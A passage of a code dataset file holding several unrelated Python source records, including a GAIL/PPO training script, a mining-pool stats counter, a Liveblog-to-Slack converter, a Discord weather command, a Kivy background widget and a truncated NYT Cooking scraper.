MPI\nfrom collections import deque\nfrom mpi_adam import MpiAdam\nfrom statistics import stats\nfrom mlp_policy import MlpPolicy\nfrom box import Box\n\ndef traj_segment_generator(pi, env, reward_giver, horizon, stochastic):\n # Initialize state variables\n t = 0\n ac = env.action_space.sample()\n new = True\n rew = 0.0\n true_rew = 0.0\n ob = env.reset()\n\n cur_ep_ret = 0\n cur_ep_len = 0\n cur_ep_true_ret = 0\n ep_true_rets = []\n ep_rets = []\n ep_lens = []\n\n # Initialize history arrays\n obs = np.array([ob for _ in range(horizon)])\n next_obs = obs.copy()\n transitions = obs.copy()\n true_rews = np.zeros(horizon, 'float32')\n rews = np.zeros(horizon, 'float32')\n vpreds = np.zeros(horizon, 'float32')\n news = np.zeros(horizon, 'int32')\n acs = np.array([ac for _ in range(horizon)])\n prevacs = acs.copy()\n\n while True:\n prevac = ac\n masked_ob = ob.copy()\n masked_ob[0] = 0 # mask root_x\n ac, vpred = pi.act(stochastic=stochastic, ob=masked_ob)\n # Slight weirdness here because we need value function at time T\n # before returning segment [0, T-1] so we get the correct\n # terminal value\n if t > 0 and t % horizon == 0:\n yield {\"ob\": obs, \"next_ob\": next_obs, \"transitions\":transitions, \"rew\": rews, \"vpred\": vpreds, \"new\": news,\n \"ac\": acs, \"prevac\": prevacs, \"nextvpred\": vpred * (1 - new),\n \"ep_rets\": ep_rets, \"ep_lens\": ep_lens, \"ep_true_rets\": ep_true_rets}\n _, vpred = pi.act(stochastic=stochastic, ob=masked_ob)\n # Be careful!!! if you change the downstream algorithm to aggregate\n # several of these batches, then be sure to do a deepcopy\n ep_rets = []\n ep_true_rets = []\n ep_lens = []\n i = t % horizon\n\n obs[i] = masked_ob\n vpreds[i] = vpred\n news[i] = new\n acs[i] = ac\n prevacs[i] = prevac\n\n ob_len = len(ob)\n next_ob, true_rew, new, _ = env.step(ac)\n pos_0 = ob[:ob_len//2].copy()\n pos_1 = next_ob[:ob_len//2].copy()\n pos_1[0] -= pos_0[0]\n pos_0[0] = 0\n\n transition = np.concatenate([pos_0, pos_1])\n transitions[i] = transition\n d_rew = 10 * reward_giver.get_reward(transition)\n \n next_obs[i] = next_ob\n ob = next_ob\n\n rews[i] = d_rew\n true_rews[i] = true_rew\n\n cur_ep_ret += d_rew\n cur_ep_true_ret += true_rew\n cur_ep_len += 1\n if new:\n ep_rets.append(cur_ep_ret)\n ep_true_rets.append(cur_ep_true_ret)\n ep_lens.append(cur_ep_len)\n cur_ep_ret = 0\n cur_ep_true_ret = 0\n cur_ep_len = 0\n ob = env.reset()\n t += 1\n\ndef add_vtarg_and_adv(seg, gamma, lam):\n new = np.append(seg[\"new\"], 0) # last element is only used for last vtarg, but we already zeroed it if last new = 1\n vpred = np.append(seg[\"vpred\"], seg[\"nextvpred\"])\n T = len(seg[\"rew\"])\n seg[\"adv\"] = gaelam = np.empty(T, 'float32')\n rew = seg[\"rew\"]\n lastgaelam = 0\n for t in reversed(range(T)):\n nonterminal = 1-new[t+1]\n delta = rew[t] + gamma * vpred[t+1] * nonterminal - vpred[t]\n gaelam[t] = lastgaelam = delta + gamma * lam * nonterminal * lastgaelam\n seg[\"tdlamret\"] = seg[\"adv\"] + seg[\"vpred\"]\n\n\ndef learn(env, policy_func, reward_giver, expert_dataset, rank, ckpt_dir, task_name,\n g_step=1, save_per_iter=100, g_optim_batchsize=64,\n timesteps_per_batch=4096, clip_param=0.2, entcoeff=0.01, g_optim_epochs=4,\n gamma=0.99, lam=0.95, adam_epsilon=1e-5, lr_schedule='linear',\n g_stepsize=1e-4, d_stepsize=1e-4, \n max_timesteps=0,\n callback=None):\n\n nworkers = MPI.COMM_WORLD.Get_size()\n rank = MPI.COMM_WORLD.Get_rank()\n np.set_printoptions(precision=3)\n # Setup losses and stuff\n # ----------------------------------------\n ob_space = env.observation_space\n ac_space = env.action_space\n pi = policy_func(\"pi\", ob_space, ac_space)\n oldpi = policy_func(\"oldpi\", ob_space, ac_space)\n atarg = tf.placeholder(dtype=tf.float32, shape=[None]) # Target advantage function (if applicable)\n ret = tf.placeholder(dtype=tf.float32, shape=[None]) # Empirical return\n lrmult = tf.placeholder(name='lrmult', dtype=tf.float32, shape=[]) # learning rate multiplier, updated with schedule\n clip_param = clip_param * lrmult # Annealed cliping parameter epislon\n \n ob = U.get_placeholder_cached(name=\"ob\")\n ac = pi.pdtype.sample_placeholder([None])\n\n kloldnew = oldpi.pd.kl(pi.pd)\n ent = pi.pd.entropy()\n meankl = tf.reduce_mean(kloldnew)\n meanent = tf.reduce_mean(ent)\n pol_entpen = (-entcoeff) * meanent\n # entbonus = entcoeff * meanent\n\n \n\n ratio = tf.exp(pi.pd.logp(ac) - oldpi.pd.logp(ac)) # advantage * pnew / pold\n\n surr1 = ratio * atarg \n surr2 = tf.clip_by_value(ratio, 1.0 - clip_param, 1.0 + clip_param) * atarg\n # PPO's pessimistic surrogate (L^CLIP)\n pol_surr = - tf.reduce_mean(tf.minimum(surr1, surr2))\n vferr = tf.reduce_mean(tf.square(pi.vpred - ret))\n total_loss = pol_surr + pol_entpen + vferr\n\n losses = [pol_surr, pol_entpen, vferr, meankl, meanent]\n loss_names = [\"pol_surr\", \"pol_entpen\", \"vf_loss\", \"kl\", \"ent\"]\n var_list = pi.get_trainable_variables()\n \n\n\n g_adam = MpiAdam(var_list, epsilon=adam_epsilon)\n d_adam = MpiAdam(reward_giver.get_trainable_variables())\n\n get_flat = U.GetFlat(var_list)\n set_from_flat = U.SetFromFlat(var_list)\n\n\n assign_old_eq_new = U.function([], [], updates=[tf.assign(oldv, newv)\n for (oldv, newv) in zipsame(oldpi.get_variables(), pi.get_variables())])\n\n lossandgrad = U.function([ob, ac, atarg, ret, lrmult],\n [U.flatgrad(total_loss, var_list)] + losses)\n\n clipped_ratio = tf.reduce_mean(tf.to_float(tf.greater(tf.abs(ratio - 1.0), clip_param)))\n ac_std = tf.reduce_mean(pi.pd.std)\n compute_clipped_ratio = U.function([ob, ac, atarg, ret, lrmult],[clipped_ratio])\n compute_ac_std = U.function([ob, ac, atarg, ret, lrmult],[ac_std])\n compute_losses = U.function([ob, ac, atarg, ret, lrmult],\n losses)\n\n @contextmanager\n def timed(msg):\n if rank == 0:\n print(colorize(msg, color='magenta'))\n tstart = time.time()\n yield\n print(colorize(\"done in %.3f seconds\" % (time.time() - tstart), color='magenta'))\n else:\n yield\n\n def allmean(x):\n assert isinstance(x, np.ndarray)\n out = np.empty_like(x)\n MPI.COMM_WORLD.Allreduce(x, out, op=MPI.SUM)\n out /= nworkers\n return out\n\n U.initialize()\n th_init = get_flat()\n MPI.COMM_WORLD.Bcast(th_init, root=0)\n set_from_flat(th_init)\n g_adam.sync()\n d_adam.sync()\n if rank == 0:\n print(\"Init param sum\", th_init.sum(), flush=True)\n\n # Prepare for rollouts\n # ----------------------------------------\n seg_gen = traj_segment_generator(pi, env, reward_giver, timesteps_per_batch, stochastic=True)\n\n episodes_so_far = 0\n timesteps_so_far = 0\n iters_so_far = 0\n tstart = time.time()\n lenbuffer = deque(maxlen=40) # rolling buffer for episode lengths\n rewbuffer = deque(maxlen=40) # rolling buffer for episode rewards\n true_rewbuffer = deque(maxlen=40)\n\n\n\n replay_buffer = {'transitions':[]}\n\n\n\n while True:\n if callback: callback(locals(), globals())\n if max_timesteps and timesteps_so_far >= max_timesteps:\n break\n\n\n # Save model\n if rank == 0 and iters_so_far % save_per_iter == 0 and ckpt_dir is not None:\n fname = osp.join(ckpt_dir,\"%06d/%s\" %(iters_so_far, task_name))\n os.makedirs(os.path.dirname(fname), exist_ok=True)\n saver = tf.train.Saver()\n saver.save(tf.get_default_session(), fname)\n # Increase Env Max Time\n if iters_so_far % 500 == 0 and iters_so_far != 0:\n env.set_max_time(2 * env.get_max_time())\n\n if lr_schedule == 'constant':\n cur_lrmult = 1.0\n elif lr_schedule == 'linear':\n cur_lrmult = max(1.0 - float(timesteps_so_far) / max_timesteps, 0)\n else:\n raise NotImplementedError\n\n\n logger.log(\"********** Iteration %i ************\" % iters_so_far)\n\n\n\n # ------------------ Update G ------------------\n logger.log(\"Optimizing Policy...\")\n for _ in range(g_step):\n with timed(\"sampling\"):\n seg = seg_gen.__next__()\n add_vtarg_and_adv(seg, gamma, lam)\n ob, ac, atarg, tdlamret = seg[\"ob\"], seg[\"ac\"], seg[\"adv\"], seg[\"tdlamret\"]\n transitions = seg[\"transitions\"]\n\n if len(replay_buffer['transitions']) > 100: \n replay_buffer['transitions'].pop(0)\n replay_buffer['transitions'].append(transitions)\n\n vpredbefore = seg[\"vpred\"] # predicted value function before udpate\n atarg = (atarg - atarg.mean()) / atarg.std() # standardized advantage function estimate\n\n if hasattr(pi, \"ob_rms\"): pi.ob_rms.update(ob) # update running mean/std for policy\n\n g_dataset = Dataset(dict(ob=ob, ac=ac, atarg=atarg, vtarg=tdlamret), shuffle=True)\n # set old parameter values to new parameter values\n assign_old_eq_new() \n logger.log(\"Optimizing...\")\n logger.log(fmt_row(13, loss_names))\n\n # Here we do a bunch of optimization epochs over the data\n for k in range(g_optim_epochs):\n # list of tuples, each of which gives the loss for a minibatch\n losses = []\n for i, batch in enumerate(g_dataset.iterate_once(g_optim_batchsize)):\n grad, *newlosses = lossandgrad(batch[\"ob\"], batch[\"ac\"],\n batch[\"atarg\"], batch[\"vtarg\"], cur_lrmult,\n )\n g_adam.update(grad, g_stepsize * cur_lrmult)\n losses.append(newlosses)\n logger.log(fmt_row(13, np.mean(losses, axis=0)))\n all_data = g_dataset.all_data()\n \n logger.record_tabular(\"MeanClippedRatio\", compute_clipped_ratio(all_data[\"ob\"], all_data[\"ac\"], all_data[\"atarg\"], all_data[\"vtarg\"], cur_lrmult)[0])\n logger.record_tabular(\"MeanAcStd\", compute_ac_std(all_data[\"ob\"], all_data[\"ac\"], all_data[\"atarg\"], all_data[\"vtarg\"], cur_lrmult)[0])\n\n\n # ------------------ Update D ------------------\n logger.log(\"Optimizing Discriminator...\")\n logger.log(fmt_row(13, reward_giver.loss_name))\n batch_size = 256\n d_losses = [] # list of tuples, each of which gives the loss for a minibatch\n\n transitions_all = np.concatenate(replay_buffer['transitions'], axis=0)\n # sample_idx = np.random.randint(0, transitions_all.shape[0], timesteps_per_batch*8)\n # transitions_downsample = transitions_all[sample_idx]\n\n for transition_batch, _ in dataset.iterbatches((transitions_all, transitions_all),\n include_final_partial_batch=False,\n batch_size=batch_size):\n transition_expert = expert_dataset.get_next_batch(len(transition_batch))\n # update running mean/std for reward_giver\n if hasattr(reward_giver, \"obs_rms\"): reward_giver.obs_rms.update(np.concatenate((transition_batch, transition_expert), 0))\n *newlosses, g = reward_giver.lossandgrad(transition_batch, transition_expert)\n d_adam.update(allmean(g), d_stepsize)\n d_losses.append(newlosses)\n logger.log(fmt_row(13, np.mean(d_losses, axis=0)))\n\n lrlocal = (seg[\"ep_lens\"], seg[\"ep_rets\"], seg[\"ep_true_rets\"]) # local values\n listoflrpairs = MPI.COMM_WORLD.allgather(lrlocal) # list of tuples\n\n def flatten_lists(listoflists):\n return [el for list_ in listoflists for el in list_]\n\n lens, rews, true_rets = map(flatten_lists, zip(*listoflrpairs))\n true_rewbuffer.extend(true_rets)\n lenbuffer.extend(lens)\n rewbuffer.extend(rews)\n\n\n \n\n logger.record_tabular(\"EpLenMean\", np.mean(lenbuffer))\n logger.record_tabular(\"EpRewMean\", np.mean(rewbuffer))\n logger.record_tabular(\"EpTrueRewMean\", np.mean(true_rewbuffer))\n # logger.record_tabular(\"EpThisIter\", len(lens))\n episodes_so_far += len(lens)\n timesteps_so_far += sum(lens) * g_step * g_optim_epochs\n iters_so_far += 1\n\n # logger.record_tabular(\"EpisodesSoFar\", episodes_so_far)\n logger.record_tabular(\"ItersSoFar\", iters_so_far)\n logger.record_tabular(\"TimestepsSoFar\", timesteps_so_far)\n # logger.record_tabular(\"TimeElapsed\", time.time() - tstart)\n\n if rank == 0:\n logger.dump_tabular()\n\n\n\n\ndef runner(env, policy_func, load_model_path, timesteps_per_batch, number_trajs,\n stochastic_policy, save=False, reuse=False):\n\n # Setup network\n # ----------------------------------------\n ob_space = env.observation_space\n ac_space = env.action_space\n pi = policy_func(\"pi\", ob_space, ac_space, reuse=reuse)\n U.initialize()\n # Prepare for rollouts\n # ----------------------------------------\n U.load_state(load_model_path)\n\n obs_list = []\n acs_list = []\n len_list = []\n ret_list = []\n from tqdm import tqdm\n for _ in tqdm(range(number_trajs)):\n traj = traj_1_generator(pi, env, timesteps_per_batch, stochastic=stochastic_policy)\n obs, acs, ep_len, ep_ret = traj['ob'], traj['ac'], traj['ep_len'], traj['ep_ret']\n obs_list.append(obs)\n acs_list.append(acs)\n len_list.append(ep_len)\n ret_list.append(ep_ret)\n if stochastic_policy:\n print('stochastic policy:')\n else:\n print('deterministic policy:')\n if save:\n filename = load_model_path.split('/')[-1] + '.' + env.spec.id\n np.savez(filename, obs=np.array(obs_list), acs=np.array(acs_list),\n lens=np.array(len_list), rets=np.array(ret_list))\n avg_len = sum(len_list)/len(len_list)\n avg_ret = sum(ret_list)/len(ret_list)\n print(\"Average length:\", avg_len)\n print(\"Average return:\", avg_ret)\n return avg_len, avg_ret\n\n# Sample one trajectory (until trajectory end)\ndef traj_1_generator(pi, env, horizon, stochastic):\n\n t = 0\n ac = env.action_space.sample() # not used, just so we have the datatype\n new = True # marks if we're on first timestep of an episode\n\n ob = env.reset()\n ob[0] = 0\n cur_ep_ret = 0 # return in current episode\n cur_ep_len = 0 # len of current episode\n\n # Initialize history arrays\n obs = []\n rews = []\n news = []\n acs = []\n\n while True:\n ac, vpred = pi.act(stochastic=stochastic, ob=ob)\n obs.append(ob)\n news.append(new)\n acs.append(ac)\n\n ob, rew, new, _ = env.step(ac)\n ob[0] = 0\n env.render()\n rews.append(rew)\n\n cur_ep_ret += rew\n cur_ep_len += 1\n if new or t >= horizon:\n break\n t += 1\n\n obs = np.array(obs)\n rews = np.array(rews)\n news = np.array(news)\n acs = np.array(acs)\n traj = {\"ob\": obs, \"rew\": rews, \"new\": news, \"ac\": acs,\n \"ep_ret\": cur_ep_ret, \"ep_len\": cur_ep_len}\n return traj\n\n\n\ndef main(args):\n U.make_session(num_cpu=1).__enter__()\n C = Box.from_yaml(filename=args.config)\n set_global_seeds(C.seed)\n\n from dp_env_biped_PID import DPEnv\n env = DPEnv(C)\n\n\n def policy_func(name, ob_space, ac_space, reuse=False):\n return MlpPolicy(name=name, ob_space=ob_space, ac_space=ac_space,\n reuse=reuse, hid_size=C.policy_hidden_size, num_hid_layers=C.num_hid_layers)\n\n if args.task == 'train':\n import logging\n import os.path as osp\n import bench\n\n gym.logger.setLevel(logging.INFO)\n save_name = str(datetime.datetime.now().strftime(\"%y%m%d-%H%M%S\"))\n save_name += \"-%s\" % (\"norm1\")\n save_name += \"-%s\" % osp.basename(args.config).split('.')[0]\n checkpoint_dir = osp.join(C.checkpoint_dir, save_name)\n log_dir = osp.join(checkpoint_dir, \"log\")\n task_name = C.motion_file.split('.')[0]\n\n if MPI is None or MPI.COMM_WORLD.Get_rank() == 0:\n os.makedirs(checkpoint_dir, exist_ok=True)\n C.to_yaml(osp.join(checkpoint_dir, \"config.yaml\"))\n logger.configure(dir=log_dir)\n\n if MPI.COMM_WORLD.Get_rank() != 0:\n logger.set_level(logger.DISABLED)\n else:\n logger.set_level(logger.INFO)\n\n\n env = bench.Monitor(env, logger.get_dir() and\n osp.join(logger.get_dir(), \"monitor.json\"))\n\n\n expert_dataset = Dset_transition(transitions = env.env.sample_expert_traj())\n ob_length = env.observation_space.shape[0] # shape of ob + act = shape of ob + next_ob\n reward_giver = Discriminator(ob_length, C.adversary_hidden_size, entcoeff=C.adversary_entcoeff)\n\n rank = MPI.COMM_WORLD.Get_rank()\n if rank != 0:\n logger.set_level(logger.DISABLED)\n workerseed = C.seed + 10000 * MPI.COMM_WORLD.Get_rank()\n set_global_seeds(workerseed)\n env.seed(workerseed)\n \n\n learn(env, policy_func, reward_giver, expert_dataset, rank, checkpoint_dir, task_name,\n g_step=C.g_step, save_per_iter=C.save_per_iter, g_optim_batchsize=C.g_optim_batchsize,\n timesteps_per_batch=C.timesteps_per_batch, clip_param=C.clip_param, entcoeff=C.entcoeff, g_optim_epochs=C.g_optim_epochs,\n gamma=C.gamma, lam=C.lam, adam_epsilon=C.adam_epsilon, lr_schedule=C.lr_schedule,\n g_stepsize=C.g_stepsize, d_stepsize=C.d_stepsize, \n max_timesteps=C.max_timesteps,\n callback=None)\n\n\n elif args.task == 'evaluate':\n runner(env,\n policy_func,\n args.load_model_path,\n timesteps_per_batch=1024,\n number_trajs=20,\n stochastic_policy=args.stochastic_policy,\n save=args.save_sample,\n )\n env.close()\n\ndef argsparser():\n parser = argparse.ArgumentParser(\"Tensorflow Implementation of GAIL\")\n parser.add_argument('--config', help='yaml config file path', type=str)\n # for evaluatation\n parser.add_argument('--task', type=str, choices=['train', 'evaluate', 'sample'], default='train')\n boolean_flag(parser, 'stochastic_policy', default=False, help='use stochastic/deterministic policy to evaluate')\n boolean_flag(parser, 'save_sample', default=False, help='save the trajectories or not')\n parser.add_argument('--load_model_path', help='if provided, load the model', type=str, default=None)\n return parser.parse_args()\n\nif __name__ == \"__main__\":\n args = argsparser()\n main(args)\n","sub_path":"src_gail/gail_ppo_PID_norm1.py","file_name":"gail_ppo_PID_norm1.py","file_ext":"py","file_size_in_byte":19804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"25928666","text":"from gevent import sleep\nfrom collections import deque\n\nimport threading\nimport logging\nimport time\n\n\nlogger = logging.getLogger('stats')\ncpu_times = (None, None)\n\n\ndef stat_rotater(server_state, celery):\n global cpu_times\n last_tick = int(time.time())\n last_send = (int(time.time()) // 60) * 60\n while True:\n now = time.time()\n # time to rotate minutes?\n if now > (last_send + 60):\n shares = server_state['shares'].tock()\n reject_low = server_state['reject_low'].tock()\n reject_dup = server_state['reject_dup'].tock()\n reject_stale = server_state['reject_stale'].tock()\n server_state['stratum_connects'].tock()\n server_state['stratum_disconnects'].tock()\n server_state['agent_connects'].tock()\n server_state['agent_disconnects'].tock()\n\n if shares or reject_dup or reject_low or reject_stale:\n celery.send_task_pp(\n 'add_one_minute', 'pool', shares, now, '', reject_dup,\n reject_low, reject_stale)\n last_send += 60\n\n # time to tick?\n if now > (last_tick + 1):\n server_state['shares'].tick()\n server_state['reject_low'].tick()\n server_state['reject_dup'].tick()\n server_state['reject_stale'].tick()\n server_state['stratum_connects'].tick()\n server_state['stratum_disconnects'].tick()\n server_state['agent_connects'].tick()\n server_state['agent_disconnects'].tick()\n last_tick += 1\n\n sleep(0.1)\n\n\nclass StatManager(object):\n def __init__(self):\n self._val = 0\n self.mins = deque([], 60)\n self.seconds = deque([], 60)\n self.lock = threading.Lock()\n self.total = 0\n\n def incr(self, amount=1):\n \"\"\" Increments the counter \"\"\"\n with self.lock:\n self._val += amount\n __add__ = incr\n\n def tick(self):\n \"\"\" should be called once every second \"\"\"\n val = self.reset()\n self.seconds.append(val)\n self.total += val\n\n def tock(self):\n # rotate the total into a minute slot\n last_min = sum(self.seconds)\n self.mins.append(last_min)\n return last_min\n\n @property\n def hour(self):\n return sum(self.mins)\n\n @property\n def minute(self):\n return sum(self.seconds)\n\n @property\n def second_avg(self):\n return sum(self.seconds) / 60.0\n\n @property\n def min_avg(self):\n return sum(self.mins) / 60.0\n\n def summary(self):\n return dict(total=self.total,\n min_total=self.minute,\n hour_total=self.hour,\n min_avg=self.min_avg)\n\n def reset(self):\n \"\"\" Locks the counter, resets the value, then returns the value \"\"\"\n with self.lock:\n curr = self._val\n self._val = 0\n return curr\n","sub_path":"powerpool/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"588531023","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2016 dpa-infocom GmbH\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport bleach\nimport logging\nimport re\n\nfrom livebridge.base import BaseConverter, ConversionResult\n\nlogger = logging.getLogger(__name__)\n\nclass LiveblogSlackConverter(BaseConverter):\n\n source = \"liveblog\"\n target = \"slack\"\n\n async def _convert_text(self, item):\n logger.debug(\"CONVERTING TEXT\")\n content = \"\\n\"+item[\"item\"][\"text\"]\n content = content.replace(\" \", \" \")\n content = bleach.clean(content, tags=[\"p\", \"br\", \"b\", \"i\", \"strike\", \"ul\", \"li\", \"ol\", \"a\", \"div\"], strip=True)\n content = re.sub(r'(.*?)', '<\\\\1|\\\\2>', content, flags=re.I|re.M)\n content = content.replace(\"
    \", \"\").replace(\"
\", \"\\n\")\n content = re.sub(r'[ ]+', ' ', content)\n content = re.sub(r' ', ' ', content)\n content = re.sub(r' ', ' ', content)\n content = re.sub(r' ', ' ', content)\n content = re.sub(r' ', ' ', content)\n content = re.sub(r'[ ]*', ' ', content)\n content = re.sub(r'[ ]*', ' ', content)\n content = content.replace(\"
    \", \"\").replace(\"
\", \"\\n\")\n content = content.replace(\"\", \"\\n\")\n content = content.replace(\"
  • \", \" • \")\n content = content.replace(\"

    \", \"\\n\")\n content = content.replace(\"\", \"\\n\")\n content = content.replace(\"\", \"*\")\n content = content.replace(\"\", \"* \")\n content = content.replace(\"

    \", \"
    \")\n content = content.replace(\"
    \", \"\\n\")\n content = re.sub(r'<\\/?i>', '_', content)\n content = re.sub(r'<\\/?strike>', '~', content)\n content = re.sub('<(a|br|div|p)>', '', content)\n content = content.replace(\"«_\", \"_«\")\n content = content.replace(\"_»\", \"»_\")\n content = content.replace(\"«*\", \"*«\")\n content = content.replace(\"*»\", \"»*\")\n content = content.replace(\" ** \", \" \")\n content = content.replace(\"\\n**\", \" \")\n content = content.replace(\"*\\n*\", \"\\n\")\n return content+\"\\n\"\n\n async def _convert_quote(self, item):\n logger.debug(\"CONVERTING QUOTE\")\n meta = item[\"item\"][\"meta\"]\n content = \">*{}*\\n\".format(meta.get(\"quote\",\"\").replace(\"\\n\", \" \"))\n if meta.get(\"credit\"):\n content += \"> • _{}_\\n\\n\".format(meta.get(\"credit\", \"\"))\n return content\n\n async def _convert_image(self, item):\n logger.debug(\"CONVERTING IMAGE\")\n content = \"\"\n tmp_path = None\n try:\n # handle image\n image_data = item[\"item\"][\"meta\"][\"media\"][\"renditions\"][\"viewImage\"]\n if image_data.get(\"href\"):\n content += \"\\n{}\\n\".format(image_data[\"href\"])\n # handle text\n caption = item[\"item\"][\"meta\"][\"caption\"]\n if caption:\n content += \"\\n{} \".format(caption)\n credit = item[\"item\"][\"meta\"][\"credit\"]\n if credit:\n content += \" _({})_ \".format(credit)\n else:\n # assure at last a whitespace!\n content += \" \"\n except Exception as e:\n logger.error(\"SLACK: Fatal error when converting image.\")\n logger.exception(e)\n return content, tmp_path\n\n async def _convert_embed(self, item):\n logger.debug(\"CONVERTING EMBED\")\n content = \"\"\n meta = item[\"item\"][\"meta\"]\n if meta.get(\"original_url\"):\n if meta.get(\"html\", \"\").find('class=\"twitter-tweet\"') > -1 or \\\n meta[\"original_url\"].find(\"youtube\") > -1:\n content = \"\\n{}\\n\".format(meta[\"original_url\"])\n return content\n\n async def convert(self, post):\n content = \"\"\n images = []\n try:\n for g in post.get(\"groups\", []):\n if g[\"id\"] != \"main\":\n continue\n\n for item in g[\"refs\"]:\n if item[\"item\"][\"item_type\"] == \"text\":\n content += await self._convert_text(item)\n elif item[\"item\"][\"item_type\"] == \"quote\":\n content += await self._convert_quote(item)\n elif item[\"item\"][\"item_type\"] == \"image\":\n img_text, _ = await self._convert_image(item)\n content += img_text\n elif item[\"item\"][\"item_type\"] == \"embed\":\n content += await self._convert_embed(item)\n except Exception as e:\n logger.error(\"Converting to slack post failed.\")\n logger.exception(e)\n return ConversionResult(content=content)\n","sub_path":"livebridge_slack/converters/liveblog_slack.py","file_name":"liveblog_slack.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"61535721","text":"from discord.ext import commands\nfrom geopy.geocoders import Nominatim\nimport aiohttp\nimport os\n\n\nclass Weather(commands.Cog):\n def __init__(self, client, api_key):\n self.client = client\n self.user_agent = \"nano-bot\"\n self.api_host = \"https://api.openweathermap.org/data/2.5/onecall\"\n self.api_key = api_key\n\n @commands.command(name=\"weather\")\n async def weather(self, ctx, location=\"Cleveland\", unit=\"c\"):\n \"\"\"\n Gets weather for given location & unit (default is Cleveland & Celsius).\n \"\"\"\n geolocator = Nominatim(user_agent=self.user_agent)\n loc = geolocator.geocode(location)\n\n if unit == \"c\":\n measurement_unit = \"metric\"\n elif unit == \"f\":\n measurement_unit = \"imperial\"\n elif unit == \"k\":\n measurement_unit = \"standard\"\n\n endpoint = f\"{self.api_host}?lat={loc.latitude}&lon={loc.longitude}&appid={self.api_key}&units={measurement_unit}\"\n session = aiohttp.ClientSession()\n response = await session.get(endpoint)\n data = await response.json()\n await session.close()\n\n if data.get('error'):\n return await ctx.send(f\"Could not fetch info. Reason: {data['error']}\")\n\n current = f\"{data['current']['weather'][0]['main']}, {data['current']['temp']}º{unit.upper()} (feels like {data['current']['feels_like']}º{unit.upper()}).\"\n\n message = f\"{current}\"\n await ctx.send(message)\n\n\ndef setup(client):\n if os.environ.get('RUNNING_DOCKER_COMPOSE'):\n key_file_path = os.environ.get(\"OPENWEATHERMAP_KEY\")\n with open(key_file_path, 'r') as key_file:\n API_KEY = key_file.read()\n else:\n API_KEY = os.environ.get(\"OPENWEATHERMAP_KEY\")\n\n client.add_cog(Weather(client, API_KEY))\n","sub_path":"nano/cogs/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"185752087","text":"import kivy\nfrom kivy.app import App\nfrom kivy.logger import Logger\nfrom kivy.clock import Clock\n\n\nfrom kivy.uix.image import Image, AsyncImage\n\nfrom scene_classifier import scene_classifier\n\nimport math, random\n\n\n################################################### \nclass Background_Image( Image ):\n\n anim_delay = 0.1\n keep_data = True\n\n update_always = True\n \n def __init__( self, **kwargs):\n Logger.trace('Background Image widget building')\n super(Background_Image,self).__init__(**kwargs)\n self.allow_stretch = True\n self.img_idx = 0\n\n self.precip = ''\n self.sun = ''\n self.season = ''\n\n config = App.get_running_app().config\n self.resource_path = config.get('Background_Image', 'backgrounds')\n self.default_file = config.get('Background_Image', 'default_bg') \n self.source = self.resource_path + '\\\\' + self.default_file\n\n self.scene_parser = scene_classifier( config.get('Background_Image', 'base_path') + '\\\\' + config.get('Background_Image', 'config_file') )\n self.scene_parser.debug = False\n\n self.update_image()\n\n try:\n update_time = config.getint('Background_Image', 'update_interval')\n except:\n \n Logger.warning(\"[Background Image] invalid update time....defaulting to 30 minutes\")\n update_time = 1800\n \n Clock.schedule_interval( self.update_image, update_time )\n\n def _image_loaded(self, proxyImage):\n if proxyImage.image.texture:\n self.texture = proxyImage.image.texture\n\n def parse_current_state( self ):\n try:\n wx = App.get_running_app().weather_processor\n\n ### Current Precip\n conditions = wx.translate_conditions()\n precip = conditions['precip']\n\n ### Current Sunstate\n sun = wx.get_sun_state()\n\n ### current season\n season = wx.get_season()\n\n if self.update_always or not self.cond_same( precip, sun, season ):\n\n #Find the matching background\n files = self.scene_parser.find_scene( season = season, wx = precip, tod = sun )\n \n if len(files) == 0 and precip != 'none': files = self.scene_parser.find_scene( wx = self.precip, tod = self.sun )\n if len(files) == 0 : files = [ self.resource_path + '\\\\' + self.default_file ]\n\n self.precip = precip\n self.sun = sun\n self.season = season\n\n idx = random.randint(0, len(files)-1)\n \n return files[idx][0]\n except Exception as exp:\n Logger.error(\"[Background Image] Error parsing current weather. \" + exp.message )\n\n return None\n\n\n def cond_same( self, precip, sun, season ):\n return precip == self.precip and sun == self.sun and season == self.season\n \n \n\n def update_image(self, dt = None):\n bg_file = self.parse_current_state()\n \n if bg_file:\n Logger.trace(\"[Background Image] Updating Image: \" + bg_file )\n self.source = self.resource_path + '\\\\' + bg_file\n \n","sub_path":"background_widgets.py","file_name":"background_widgets.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"113773661","text":"'''\ncommand to run the crawler\nscrapy crawl nytcooking -o recipes.json -t json\n'''\n\n# -*- coding: utf-8 -*-\nimport scrapy\n\nfrom urllib.parse import urljoin\nfrom nyt_cooking.items import *\n\nclass NytcookingSpider(scrapy.Spider):\n name = \"nytcooking\"\n allowed_domains = [\"cooking.nytimes.com\"]\n start_urls = ['https://cooking.nytimes.com/search?q=&page=1']\n\n def parse(self, response):\n for p in range(1, 381): ##381 pages in the search # for testing, use range(1, 2)\n page = 'https://cooking.nytimes.com/search?q=&page='+ str(p)\n yield scrapy.Request(page, callback=self.parse_page)\n\n #parse links from one search page\n def parse_page(self, response):\n n = 0\n #extract links in the search page\n all_recipes_links = response.css(\"div.card-info-wrapper a::attr(href)\").extract()\n if_image = response.css('div.image-wrap a div.image img::attr(data-large)').extract() #retuen the links for recipe image\n \n for recipe in all_recipes_links:\n link = urljoin('https://cooking.nytimes.com/', recipe)\n #only parse recipe with a picture\n if \"pattern\" not in if_image[n]: # a recipe without a picture will has \"pattern\" in the image url\n yield 